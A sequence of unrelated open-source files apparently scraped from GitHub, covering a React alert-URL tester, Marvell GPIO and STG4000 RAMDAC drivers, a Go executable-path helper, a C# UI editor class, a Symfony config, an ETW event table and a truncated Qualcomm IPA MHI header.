import * as React from 'react' import { Row, Select, Button } from 'antd' import { origin, colors as C } from '../../config' import './AlertURLDetail.css' interface P { alertURL: string } interface S { recipients: string[] result: any isSending: boolean } export default class AlertURLDetail extends React.Component<P, S> { state: S = { recipients: [], result: {}, isSending: false, } getRequestOutput() { const result = this.state.result switch (result.status) { case 'OK': return ( <span style={{ color: [C.cyan, C.blue, C.green, C.yellow, C.red, C.pink][ Math.floor(result.statusCode / 100) ], }} > {result.statusCode} {result.statusText} </span> ) case 'Error': return ( <span style={{ color: C.red }}> {result.name}: {result.message} </span> ) default: return '' } } send = () => { this.setState({ isSending: true }) fetch(`${origin}/settings/test`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ alertURL: this.props.alertURL, recipients: this.state.recipients, }), }) .then(res => res.json()) .then(result => { this.setState({ isSending: false, result, }) }) } update = (recipients: string[]) => { this.setState({ recipients }) } render() { return ( <div className="alerturldetail"> <pre> POST {this.props.alertURL} <br /> Content-Type: application/json <br /> <br /> {JSON.stringify( { recipients: this.state.recipients, name: '查询当前时间', URL: 'https://your.server/your/api', status: 'Error', statusCode: 200, responseTime: 53, now: 1484292986935, errName: 'AssertionError', errMessage: '慢了123秒', body: '{now:1484292863588}', readType: 'json', testCase: 'const d = Date.now() - body.now\nassert(d < 60000, `慢了${d/1000|0}秒`)', }, null, 2, )} </pre> <Row type="flex" justify="space-between" className="row"> <Select placeholder="告警接收人" mode="tags" size="large" onChange={this.update} tokenSeparators={[',', ' ']} /> <Button size="large" icon="rocket" loading={this.state.isSending} onClick={this.send} > 测试 </Button> </Row> <div style={{ lineHeight: 
'32px' }}>{this.getRequestOutput()}</div> <pre>{this.state.result.body}</pre> </div> ) } }
{ "pile_set_name": "Github" }
/******************************************************************************* Copyright (C) Marvell International Ltd. and its affiliates This software file (the "File") is owned and distributed by Marvell International Ltd. and/or its affiliates ("Marvell") under the following alternative licensing terms. Once you have made an election to distribute the File under one of the following license alternatives, please (i) delete this introductory statement regarding license alternatives, (ii) delete the two license alternatives that you have not elected to use and (iii) preserve the Marvell copyright notice above. ******************************************************************************** Marvell Commercial License Option If you received this File from Marvell and you have entered into a commercial license agreement (a "Commercial License") with Marvell, the File is licensed to you under the terms of the applicable Commercial License. ******************************************************************************** Marvell GPL License Option If you received this File from Marvell, you may opt to use, redistribute and/or modify this File in accordance with the terms and conditions of the General Public License Version 2, June 1991 (the "GPL License"), a copy of which is available along with the File in the license.txt file or by writing to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 or on the worldwide web at http://www.gnu.org/licenses/gpl.txt. THE FILE IS DISTRIBUTED AS-IS, WITHOUT WARRANTY OF ANY KIND, AND THE IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE ARE EXPRESSLY DISCLAIMED. The GPL License provides additional details about this warranty disclaimer. 
******************************************************************************** Marvell BSD License Option If you received this File from Marvell, you may opt to use, redistribute and/or modify this File under the following licensing terms. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of Marvell nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*******************************************************************************/

#include "gpp/mvGpp.h"
#include "ctrlEnv/mvCtrlEnvLib.h"

/* defines  */
#ifdef MV_DEBUG
#define DB(x) x
#else
#define DB(x)
#endif

/* Read-modify-write helper: applies (value & mask) to the masked bits of a
 * GPP register, leaving all other bits untouched. Defined at end of file. */
static MV_VOID gppRegSet(MV_U32 group, MV_U32 regOffs,MV_U32 mask,MV_U32 value);

/*******************************************************************************
* mvGppTypeSet - Enable a GPP (OUT) pin
*
* DESCRIPTION:
*       Configures the direction (input/output) of the GPP pins selected by
*       mask, by writing the group's data-out-enable register.
*
* INPUT:
*       group - GPP group number
*       mask  - 32bit mask value. Each set bit in the mask means that the type
*               of corresponding GPP will be set. Other GPPs are ignored.
*       value - 32bit value that describes GPP type per pin.
*
* OUTPUT:
*       None.
*
* EXAMPLE:
*       Set GPP8 to input and GPP15 to output.
*       mvGppTypeSet(0, (GPP8 | GPP15),
*                    ((MV_GPP_IN & GPP8) | (MV_GPP_OUT & GPP15)) );
*
* RETURN:
*       None.
*
*******************************************************************************/
MV_STATUS mvGppTypeSet(MV_U32 group, MV_U32 mask, MV_U32 value)
{
	if (group >= MV_GPP_MAX_GROUP)
	{
		DB(mvOsPrintf("mvGppTypeSet: ERR. invalid group number \n"));
		return MV_BAD_PARAM;
	}

	gppRegSet(group, GPP_DATA_OUT_EN_REG(group), mask, value);

	/* Workaround for Erratum FE-MISC-70 -- on the A0 revision, bit 1 of
	 * group 1 must be mirrored into group 0's out-enable register. */
	if(mvCtrlRevGet()==MV_88F6XXX_A0_REV && (group == 1))
	{
		mask &= 0x2;
		gppRegSet(0, GPP_DATA_OUT_EN_REG(0), mask, value);
	} /*End of WA*/

	return MV_OK;
}

/*******************************************************************************
* mvGppBlinkEn - Set a GPP (IN) Pin list to blink every ~100ms
*
* DESCRIPTION:
*       Enables/disables the hardware blink feature per pin via the group's
*       blink-enable register.
*
* INPUT:
*       group - GPP group number
*       mask  - 32bit mask value. Each set bit in the mask means that the type
*               of corresponding GPP will be set. Other GPPs are ignored.
*       value - 32bit value that describes GPP blink per pin.
*
* OUTPUT:
*       None.
*
* EXAMPLE:
*       Set GPP8 to be static and GPP15 to be blinking.
*       mvGppBlinkEn(0, (GPP8 | GPP15),
*                    ((MV_GPP_OUT_STATIC & GPP8) | (MV_GPP_OUT_BLINK & GPP15)) );
*
* RETURN:
*       None.
*
*******************************************************************************/
MV_STATUS mvGppBlinkEn(MV_U32 group, MV_U32 mask, MV_U32 value)
{
	if (group >= MV_GPP_MAX_GROUP)
	{
		DB(mvOsPrintf("mvGppBlinkEn: ERR. invalid group number \n"));
		return MV_BAD_PARAM;
	}

	gppRegSet(group, GPP_BLINK_EN_REG(group), mask, value);

	return MV_OK;
}

/*******************************************************************************
* mvGppPolaritySet - Set a GPP (IN) Pin list Polarity mode
*
* DESCRIPTION:
*       Sets per-pin input polarity (original vs. inverted) via the group's
*       data-in-polarity register.
*
* INPUT:
*       group - GPP group number
*       mask  - 32bit mask value. Each set bit in the mask means that the type
*               of corresponding GPP will be set. Other GPPs are ignored.
*       value - 32bit value that describes GPP polarity per pin.
*
* OUTPUT:
*       None.
*
* EXAMPLE:
*       Set GPP8 to the actual pin value and GPP15 to be inverted.
*       mvGppPolaritySet(0, (GPP8 | GPP15),
*                        ((MV_GPP_IN_ORIGIN & GPP8) | (MV_GPP_IN_INVERT & GPP15)) );
*
* RETURN:
*       None.
*
*******************************************************************************/
MV_STATUS mvGppPolaritySet(MV_U32 group, MV_U32 mask, MV_U32 value)
{
	if (group >= MV_GPP_MAX_GROUP)
	{
		DB(mvOsPrintf("mvGppPolaritySet: ERR. invalid group number \n"));
		return MV_BAD_PARAM;
	}

	gppRegSet(group, GPP_DATA_IN_POL_REG(group), mask, value);

	return MV_OK;
}

/*******************************************************************************
* mvGppPolarityGet - Get a value of relevant bits from GPP Polarity register.
*
* DESCRIPTION:
*       Reads the group's data-in-polarity register and masks it.
*
* INPUT:
*       group - GPP group number
*       mask  - 32bit mask value. Each set bit in the mask means that the
*               returned value is valid for it.
*
* OUTPUT:
*       None.
*
* EXAMPLE:
*       Get GPP8 and GPP15 value.
*       mvGppPolarityGet(0, (GPP8 | GPP15));
*
* RETURN:
*       32bit value that describes GPP polatity mode per pin.
*       Note: returns MV_ERROR (all-ones) on an invalid group, which is
*       indistinguishable from a legitimate all-ones read with mask ~0.
*
*******************************************************************************/
MV_U32 mvGppPolarityGet(MV_U32 group, MV_U32 mask)
{
	MV_U32 regVal;

	if (group >= MV_GPP_MAX_GROUP)
	{
		DB(mvOsPrintf("mvGppActiveSet: Error invalid group number \n"));
		return MV_ERROR;
	}
	regVal = MV_REG_READ(GPP_DATA_IN_POL_REG(group));

	return (regVal & mask);
}

/*******************************************************************************
* mvGppValueGet - Get a GPP Pin list value.
*
* DESCRIPTION:
*       This function get GPP value.
*       NOTE(review): unlike the other entry points, this one does not
*       validate 'group' -- presumably callers guarantee a valid group.
*
* INPUT:
*       group - GPP group number
*       mask  - 32bit mask value. Each set bit in the mask means that the
*               returned value is valid for it.
*
* OUTPUT:
*       None.
*
* EXAMPLE:
*       Get GPP8 and GPP15 value.
*       mvGppValueGet(0, (GPP8 | GPP15));
*
* RETURN:
*       32bit value that describes GPP activity mode per pin.
*
*******************************************************************************/
MV_U32 mvGppValueGet(MV_U32 group, MV_U32 mask)
{
	MV_U32 gppData;

	gppData = MV_REG_READ(GPP_DATA_IN_REG(group));

	gppData &= mask;

	return gppData;
}

/*******************************************************************************
* mvGppValueSet - Set a GPP Pin list value.
*
* DESCRIPTION:
*       This function set value for given GPP pin list.
*       Rejects the request if any masked pin is configured as input.
*
* INPUT:
*       group - GPP group number
*       mask  - 32bit mask value. Each set bit in the mask means that the
*               value of corresponding GPP will be set accordingly. Other GPP
*               are not affected.
*       value - 32bit value that describes GPP value per pin.
*
* OUTPUT:
*       None.
*
* EXAMPLE:
*       Set GPP8 value of '0' and GPP15 value of '1'.
*       mvGppActiveSet(0, (GPP8 | GPP15), ((0 & GPP8) | (GPP15)) );
*
* RETURN:
*       None.
*
*******************************************************************************/
MV_STATUS mvGppValueSet (MV_U32 group, MV_U32 mask, MV_U32 value)
{
	MV_U32 outEnable, tmp;
	MV_U32 i;

	if (group >= MV_GPP_MAX_GROUP)
	{
		DB(mvOsPrintf("mvGppValueSet: Error invalid group number \n"));
		return MV_BAD_PARAM;
	}

	/* verify that the gpp pin is configured as output		*/
	/* Note that in the register out enabled -> bit = '0'.	*/
	outEnable = ~MV_REG_READ(GPP_DATA_OUT_EN_REG(group));

	/* Workaround for Erratum FE-MISC-70 -- for group 1 bit 1, the
	 * effective out-enable lives in group 0's register (see mvGppTypeSet). */
	if(mvCtrlRevGet()==MV_88F6XXX_A0_REV && (group == 1))
	{
		tmp = ~MV_REG_READ(GPP_DATA_OUT_EN_REG(0));
		outEnable &= 0xfffffffd;
		outEnable |= (tmp & 0x2);
	} /*End of WA*/

	/* Refuse to drive any masked pin that is not output-enabled. */
	for (i = 0 ; i < 32 ;i++)
	{
		if (((mask & (1 << i)) & (outEnable & (1 << i))) != (mask & (1 << i)))
		{
			mvOsPrintf("mvGppValueSet: Err. An attempt to set output "\
				"value to GPP %d in input mode.\n", i);
			return MV_ERROR;
		}
	}

	gppRegSet(group, GPP_DATA_OUT_REG(group), mask, value);

	return MV_OK;

}

/*******************************************************************************
* gppRegSet - Set a specific GPP pin on a specific GPP register
*
* DESCRIPTION:
*       This function set a specific GPP pin on a specific GPP register
*       (read-modify-write: only masked bits are changed).
*
* INPUT:
*       regOffs - GPP Register offset
*       group   - GPP group number
*       mask    - 32bit mask value. Each set bit in the mask means that the
*                 value of corresponding GPP will be set accordingly. Other GPP
*                 are not affected.
*       value   - 32bit value that describes GPP value per pin.
*
* OUTPUT:
*       None.
*
* EXAMPLE:
*       Set GPP8 value of '0' and GPP15 value of '1'.
*       gppRegSet(0, GPP_DATA_OUT_REG(0), (GPP8 | GPP15), ((0 & GPP8) | (1 & GPP15)) );
*
* RETURN:
*       None.
*
*******************************************************************************/
static MV_VOID gppRegSet (MV_U32 group, MV_U32 regOffs,MV_U32 mask,MV_U32 value)
{
	MV_U32 gppData;

	gppData = MV_REG_READ(regOffs);

	gppData &= ~mask;

	gppData |= (value & mask);

	MV_REG_WRITE(regOffs, gppData);
}
{ "pile_set_name": "Github" }
// Copyright 2012 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // +build linux netbsd openbsd package osext import ( "errors" "os" "runtime" ) func executable() (string, error) { switch runtime.GOOS { case "linux": return os.Readlink("/proc/self/exe") case "netbsd": return os.Readlink("/proc/curproc/exe") case "openbsd": return os.Readlink("/proc/curproc/file") } return "", errors.New("ExecPath not implemented for " + runtime.GOOS) }
{ "pile_set_name": "Github" }
/* * linux/drivers/video/kyro/STG4000Ramdac.c * * Copyright (C) 2002 STMicroelectronics * * This file is subject to the terms and conditions of the GNU General Public * License. See the file COPYING in the main directory of this archive * for more details. */ #include <linux/kernel.h> #include <linux/errno.h> #include <linux/types.h> #include <video/kyro.h> #include "STG4000Reg.h" #include "STG4000Interface.h" static u32 STG_PIXEL_BUS_WIDTH = 128; /* 128 bit bus width */ static u32 REF_CLOCK = 14318; int InitialiseRamdac(volatile STG4000REG __iomem * pSTGReg, u32 displayDepth, u32 displayWidth, u32 displayHeight, s32 HSyncPolarity, s32 VSyncPolarity, u32 * pixelClock) { u32 tmp = 0; u32 F = 0, R = 0, P = 0; u32 stride = 0; u32 ulPdiv = 0; u32 physicalPixelDepth = 0; /* Make sure DAC is in Reset */ tmp = STG_READ_REG(SoftwareReset); if (tmp & 0x1) { CLEAR_BIT(1); STG_WRITE_REG(SoftwareReset, tmp); } /* Set Pixel Format */ tmp = STG_READ_REG(DACPixelFormat); CLEAR_BITS_FRM_TO(0, 2); /* Set LUT not used from 16bpp to 32 bpp ??? 
*/ CLEAR_BITS_FRM_TO(8, 9); switch (displayDepth) { case 16: { physicalPixelDepth = 16; tmp |= _16BPP; break; } case 32: { /* Set for 32 bits per pixel */ physicalPixelDepth = 32; tmp |= _32BPP; break; } default: return -EINVAL; } STG_WRITE_REG(DACPixelFormat, tmp); /* Workout Bus transfer bandwidth according to pixel format */ ulPdiv = STG_PIXEL_BUS_WIDTH / physicalPixelDepth; /* Get Screen Stride in pixels */ stride = displayWidth; /* Set Primary size info */ tmp = STG_READ_REG(DACPrimSize); CLEAR_BITS_FRM_TO(0, 10); CLEAR_BITS_FRM_TO(12, 31); tmp |= ((((displayHeight - 1) << 12) | (((displayWidth / ulPdiv) - 1) << 23)) | (stride / ulPdiv)); STG_WRITE_REG(DACPrimSize, tmp); /* Set Pixel Clock */ *pixelClock = ProgramClock(REF_CLOCK, *pixelClock, &F, &R, &P); /* Set DAC PLL Mode */ tmp = STG_READ_REG(DACPLLMode); CLEAR_BITS_FRM_TO(0, 15); /* tmp |= ((P-1) | ((F-2) << 2) | ((R-2) << 11)); */ tmp |= ((P) | ((F - 2) << 2) | ((R - 2) << 11)); STG_WRITE_REG(DACPLLMode, tmp); /* Set Prim Address */ tmp = STG_READ_REG(DACPrimAddress); CLEAR_BITS_FRM_TO(0, 20); CLEAR_BITS_FRM_TO(20, 31); STG_WRITE_REG(DACPrimAddress, tmp); /* Set Cursor details with HW Cursor disabled */ tmp = STG_READ_REG(DACCursorCtrl); tmp &= ~SET_BIT(31); STG_WRITE_REG(DACCursorCtrl, tmp); tmp = STG_READ_REG(DACCursorAddr); CLEAR_BITS_FRM_TO(0, 20); STG_WRITE_REG(DACCursorAddr, tmp); /* Set Video Window */ tmp = STG_READ_REG(DACVidWinStart); CLEAR_BITS_FRM_TO(0, 10); CLEAR_BITS_FRM_TO(16, 26); STG_WRITE_REG(DACVidWinStart, tmp); tmp = STG_READ_REG(DACVidWinEnd); CLEAR_BITS_FRM_TO(0, 10); CLEAR_BITS_FRM_TO(16, 26); STG_WRITE_REG(DACVidWinEnd, tmp); /* Set DAC Border Color to default */ tmp = STG_READ_REG(DACBorderColor); CLEAR_BITS_FRM_TO(0, 23); STG_WRITE_REG(DACBorderColor, tmp); /* Set Graphics and Overlay Burst Control */ STG_WRITE_REG(DACBurstCtrl, 0x0404); /* Set CRC Trigger to default */ tmp = STG_READ_REG(DACCrcTrigger); CLEAR_BIT(0); STG_WRITE_REG(DACCrcTrigger, tmp); /* Set Video Port Control 
to default */ tmp = STG_READ_REG(DigVidPortCtrl); CLEAR_BIT(8); CLEAR_BITS_FRM_TO(16, 27); CLEAR_BITS_FRM_TO(1, 3); CLEAR_BITS_FRM_TO(10, 11); STG_WRITE_REG(DigVidPortCtrl, tmp); return 0; } /* Ramdac control, turning output to the screen on and off */ void DisableRamdacOutput(volatile STG4000REG __iomem * pSTGReg) { u32 tmp; /* Disable DAC for Graphics Stream Control */ tmp = (STG_READ_REG(DACStreamCtrl)) & ~SET_BIT(0); STG_WRITE_REG(DACStreamCtrl, tmp); } void EnableRamdacOutput(volatile STG4000REG __iomem * pSTGReg) { u32 tmp; /* Enable DAC for Graphics Stream Control */ tmp = (STG_READ_REG(DACStreamCtrl)) | SET_BIT(0); STG_WRITE_REG(DACStreamCtrl, tmp); }
{ "pile_set_name": "Github" }
using DeltaEngine.Content;
using DeltaEngine.Graphics;
using DeltaEngine.Rendering2D;
using DeltaEngine.Scenes.Controls;

namespace DeltaEngine.Editor.UIEditor
{
	/// <summary>
	/// Applies a newly selected material (default / hovered / pressed / disabled
	/// states) to every control currently selected in the UI editor scene.
	/// </summary>
	public class ControlMaterialChanger
	{
		public ControlMaterialChanger(UIEditorScene uiEditorScene)
		{
			this.uiEditorScene = uiEditorScene;
		}

		private readonly UIEditorScene uiEditorScene;

		/// <summary>
		/// Sets the default-state material on each selected control and resizes
		/// it to fit the new material.
		/// FIX: the original loaded the same material by name up to five times
		/// per entity and only null-checked the entity after the first load;
		/// we now null-check first and load exactly once per iteration.
		/// (ContentLoader caches content by name, so reusing the instance is
		/// equivalent -- NOTE(review): confirm against DeltaEngine caching.)
		/// </summary>
		public void ChangeMaterial(string newMaterialName)
		{
			foreach (Entity2D entity2D in uiEditorScene.SelectedEntity2DList)
			{
				// Preserves original semantics: a null entry aborts the whole loop.
				if (entity2D == null)
					return;
				var material = ContentLoader.Load<Material>(newMaterialName);
				if (entity2D.GetType() == typeof(Button) ||
					entity2D.GetType() == typeof(InteractiveButton))
					entity2D.Get<Theme>().Button = material;
				else if (entity2D.GetType() == typeof(Slider))
				{
					entity2D.Get<Theme>().Slider = material;
					entity2D.Get<Theme>().SliderDisabled = material;
				}
				else if (entity2D.GetType() == typeof(Label))
				{
					entity2D.Set(material);
					entity2D.Get<Theme>().Label = material;
					entity2D.Set(material.DefaultColor);
				}
				else
					entity2D.Set(material);
				uiEditorScene.uiControl.SetControlSize(entity2D, material, uiEditorScene);
				var rect = entity2D.DrawArea;
				uiEditorScene.uiControl.EntityWidth = rect.Width;
				uiEditorScene.uiControl.EntityHeight = rect.Height;
			}
		}

		/// <summary>Sets the mouse-over material for buttons and sliders.</summary>
		public void ChangeHoveredMaterial(string newMaterialName)
		{
			foreach (Entity2D entity2D in uiEditorScene.SelectedEntity2DList)
			{
				if (entity2D == null)
					return;
				var material = ContentLoader.Load<Material>(newMaterialName);
				if (entity2D.GetType() == typeof(Button) ||
					entity2D.GetType() == typeof(InteractiveButton))
				{
					var button = entity2D as Button;
					button.Get<Theme>().ButtonMouseover = material;
				}
				else if (entity2D.GetType() == typeof(Slider))
				{
					var slider = entity2D as Slider;
					slider.Get<Theme>().SliderPointerMouseover = material;
				}
			}
		}

		/// <summary>Sets the pressed-state material for buttons and sliders.</summary>
		public void ChangePressedMaterial(string newMaterialName)
		{
			foreach (Entity2D entity2D in uiEditorScene.SelectedEntity2DList)
			{
				if (entity2D == null)
					return;
				var material = ContentLoader.Load<Material>(newMaterialName);
				if (entity2D.GetType() == typeof(Button) ||
					entity2D.GetType() == typeof(InteractiveButton))
				{
					var button = entity2D as Button;
					button.Get<Theme>().ButtonPressed = material;
				}
				else if (entity2D.GetType() == typeof(Slider))
				{
					var slider = entity2D as Slider;
					slider.Get<Theme>().SliderPointer = material;
				}
			}
		}

		/// <summary>Sets the disabled-state material for buttons and sliders.</summary>
		public void ChangeDisabledMaterial(string newMaterialName)
		{
			foreach (Entity2D entity2D in uiEditorScene.SelectedEntity2DList)
			{
				if (entity2D == null)
					return;
				var material = ContentLoader.Load<Material>(newMaterialName);
				if (entity2D.GetType() == typeof(Button) ||
					entity2D.GetType() == typeof(InteractiveButton))
				{
					var button = entity2D as Button;
					button.Get<Theme>().ButtonDisabled = material;
				}
				else if (entity2D.GetType() == typeof(Slider))
				{
					var slider = entity2D as Slider;
					slider.Get<Theme>().SliderPointerDisabled = material;
				}
			}
		}

		/// <summary>
		/// Returns true when the named content loads as a 2D material;
		/// any load failure is treated as "not a usable material".
		/// </summary>
		public static bool TryAddMaterial(string material)
		{
			try
			{
				var loadedMaterial = ContentLoader.Load<Material>(material);
				return !((ShaderWithFormat)loadedMaterial.Shader).Format.Is3D;
			}
			catch //ncrunch: no coverage start
			{
				return false;
			} //ncrunch: no coverage end
		}
	}
}
{ "pile_set_name": "Github" }
imports: - { resource: "@SyliusCustomerBundle/test/app/config/parameters.yml" } framework: assets: false translator: { fallbacks: ["%locale%"] } secret: "%secret%" router: resource: "%kernel.project_dir%/app/config/routing.yml" form: ~ csrf_protection: true templating: engines: ['twig'] default_locale: "%locale%" session: handler_id: ~ storage_id: session.storage.mock_file http_method_override: true test: ~ twig: debug: "%kernel.debug%" strict_variables: "%kernel.debug%" doctrine: dbal: driver: "%database_driver%" path: "%database_path%" charset: UTF8 orm: entity_managers: default: auto_mapping: true fos_rest: view: formats: json: true empty_content: 204 format_listener: rules: - { path: '^/', priorities: ['json'], fallback_format: json, prefer_extension: true }
{ "pile_set_name": "Github" }
# Event 50090 - NetworkParameterStateEvent

###### Version: 0

## Description

No description is documented for this event.

## Data Dictionary

|Standard Name|Field Name|Type|Description|Sample Value|
|---|---|---|---|---|
|TBD|ProcID|UInt32|None|`None`|
|TBD|UniqueID|UInt32|None|`None`|
|TBD|StatusCode|UInt32|None|`None`|

## Tags

* etw_level_Informational
* etw_opcode_ParamChangeNotification
* etw_task_NetworkParameterStateEvent
{ "pile_set_name": "Github" }
/* Copyright (c) 2015, The Linux Foundation. All rights reserved. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 and * only version 2 as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. */ #include <linux/ipa.h> #include "ipa_i.h" /* MHI uC interface definitions */ #define IPA_HW_INTERFACE_MHI_VERSION 0x0004 #define IPA_HW_MAX_NUMBER_OF_CHANNELS 2 #define IPA_HW_MAX_NUMBER_OF_EVENTRINGS 2 #define IPA_HW_MAX_CHANNEL_HANDLE (IPA_HW_MAX_NUMBER_OF_CHANNELS-1) /** * Values that represent the MHI commands from CPU to IPA HW. * @IPA_CPU_2_HW_CMD_MHI_INIT: Initialize HW to be ready for MHI processing. * Once operation was completed HW shall respond with * IPA_HW_2_CPU_RESPONSE_CMD_COMPLETED. * @IPA_CPU_2_HW_CMD_MHI_INIT_CHANNEL: Initialize specific channel to be ready * to serve MHI transfers. Once initialization was completed HW shall * respond with IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE. * IPA_HW_MHI_CHANNEL_STATE_ENABLE * @IPA_CPU_2_HW_CMD_MHI_UPDATE_MSI: Update MHI MSI interrupts data. * Once operation was completed HW shall respond with * IPA_HW_2_CPU_RESPONSE_CMD_COMPLETED. * @IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE: Change specific channel * processing state following host request. Once operation was completed * HW shall respond with IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE. * @IPA_CPU_2_HW_CMD_MHI_DL_UL_SYNC_INFO: Info related to DL UL syncronization. * @IPA_CPU_2_HW_CMD_MHI_STOP_EVENT_UPDATE: Cmd to stop event ring processing. 
*/ enum ipa_cpu_2_hw_mhi_commands { IPA_CPU_2_HW_CMD_MHI_INIT = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 0), IPA_CPU_2_HW_CMD_MHI_INIT_CHANNEL = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 1), IPA_CPU_2_HW_CMD_MHI_UPDATE_MSI = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 2), IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 3), IPA_CPU_2_HW_CMD_MHI_DL_UL_SYNC_INFO = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 4), IPA_CPU_2_HW_CMD_MHI_STOP_EVENT_UPDATE = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 5) }; /** * Values that represent MHI related HW responses to CPU commands. * @IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE: Response to * IPA_CPU_2_HW_CMD_MHI_INIT_CHANNEL or * IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE commands. */ enum ipa_hw_2_cpu_mhi_responses { IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 0), }; /** * Values that represent MHI related HW event to be sent to CPU. * @IPA_HW_2_CPU_EVENT_MHI_CHANNEL_ERROR: Event specify the device detected an * error in an element from the transfer ring associated with the channel * @IPA_HW_2_CPU_EVENT_MHI_CHANNEL_WAKE_UP_REQUEST: Event specify a bam * interrupt was asserted when MHI engine is suspended */ enum ipa_hw_2_cpu_mhi_events { IPA_HW_2_CPU_EVENT_MHI_CHANNEL_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 0), IPA_HW_2_CPU_EVENT_MHI_CHANNEL_WAKE_UP_REQUEST = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 1), }; /** * Channel error types. * @IPA_HW_CHANNEL_ERROR_NONE: No error persists. * @IPA_HW_CHANNEL_INVALID_RE_ERROR: Invalid Ring Element was detected */ enum ipa_hw_channel_errors { IPA_HW_CHANNEL_ERROR_NONE, IPA_HW_CHANNEL_INVALID_RE_ERROR }; /** * MHI error types. 
* @IPA_HW_INVALID_MMIO_ERROR: Invalid data read from MMIO space * @IPA_HW_INVALID_CHANNEL_ERROR: Invalid data read from channel context array * @IPA_HW_INVALID_EVENT_ERROR: Invalid data read from event ring context array * @IPA_HW_NO_ED_IN_RING_ERROR: No event descriptors are available to report on * secondary event ring * @IPA_HW_LINK_ERROR: Link error */ enum ipa_hw_mhi_errors { IPA_HW_INVALID_MMIO_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 0), IPA_HW_INVALID_CHANNEL_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 1), IPA_HW_INVALID_EVENT_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 2), IPA_HW_NO_ED_IN_RING_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 4), IPA_HW_LINK_ERROR = FEATURE_ENUM_VAL(IPA_HW_FEATURE_MHI, 5), }; /** * Structure referring to the common and MHI section of 128B shared memory * located in offset zero of SW Partition in IPA SRAM. * The shared memory is used for communication between IPA HW and CPU. * @common: common section in IPA SRAM * @interfaceVersionMhi: The MHI interface version as reported by HW * @mhiState: Overall MHI state * @reserved_2B: reserved * @mhiCnl0State: State of MHI channel 0. * The state carries information regarding the error type. * See IPA_HW_MHI_CHANNEL_STATES. * @mhiCnl0State: State of MHI channel 1. * @mhiCnl0State: State of MHI channel 2. * @mhiCnl0State: State of MHI channel 3 * @mhiCnl0State: State of MHI channel 4. * @mhiCnl0State: State of MHI channel 5. * @mhiCnl0State: State of MHI channel 6. * @mhiCnl0State: State of MHI channel 7. 
* @reserved_37_34: reserved * @reserved_3B_38: reserved * @reserved_3F_3C: reserved */ struct IpaHwSharedMemMhiMapping_t { struct IpaHwSharedMemCommonMapping_t common; u16 interfaceVersionMhi; u8 mhiState; u8 reserved_2B; u8 mhiCnl0State; u8 mhiCnl1State; u8 mhiCnl2State; u8 mhiCnl3State; u8 mhiCnl4State; u8 mhiCnl5State; u8 mhiCnl6State; u8 mhiCnl7State; u32 reserved_37_34; u32 reserved_3B_38; u32 reserved_3F_3C; }; /** * Structure holding the parameters for IPA_CPU_2_HW_CMD_MHI_INIT command. * Parameters are sent as pointer thus should be reside in address accessible * to HW. * @msiAddress: The MSI base (in device space) used for asserting the interrupt * (MSI) associated with the event ring * mmioBaseAddress: The address (in device space) of MMIO structure in * host space * deviceMhiCtrlBaseAddress: Base address of the memory region in the device * address space where the MHI control data structures are allocated by * the host, including channel context array, event context array, * and rings. This value is used for host/device address translation. * deviceMhiDataBaseAddress: Base address of the memory region in the device * address space where the MHI data buffers are allocated by the host. * This value is used for host/device address translation. * firstChannelIndex: First channel ID. Doorbell 0 is mapped to this channel * firstEventRingIndex: First event ring ID. Doorbell 16 is mapped to this * event ring. */ struct 